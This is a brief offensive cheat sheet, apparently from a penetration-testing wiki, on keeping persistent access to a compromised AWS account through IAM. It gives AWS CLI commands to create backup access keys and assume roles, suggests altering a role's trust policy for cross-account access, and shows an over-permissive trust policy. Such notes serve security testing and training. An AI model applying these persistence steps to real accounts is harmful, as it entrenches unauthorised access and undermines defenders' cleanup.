IAM Persistence
How to maintain persistent aws access leveraging iam
- AWS IAM users can have up to 2 sets of access keys
- Consider creating a second pair after compromising the first so that you have a backup if the first keys get burned
# list all iam access keys for a user
aws iam list-access-keys --user-name <iamUserName> --profile <awsProfile>
# create iam access keys
aws iam create-access-key --user-name <iamUserName> --profile <awsProfile>
- Consider accessing an IAM Role, which can function across AWS accounts
- Even if you lose direct access to the target account, you can still assume the role from another account if you've modified the role's Trust Policy
# assume an iam role
aws sts assume-role --role-arn <arnIamRole> --role-session-name <whatever> --profile <awsProfile>
- Poorly written IAM policies can lead to unintended behavior
- Consider this policy which allows the Lambda service from any AWS account to assume this role
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*",
"Service": "lambda.amazonaws.com"},
"Action": "sts:AssumeRole"
}
]
}
Last modified 1mo ago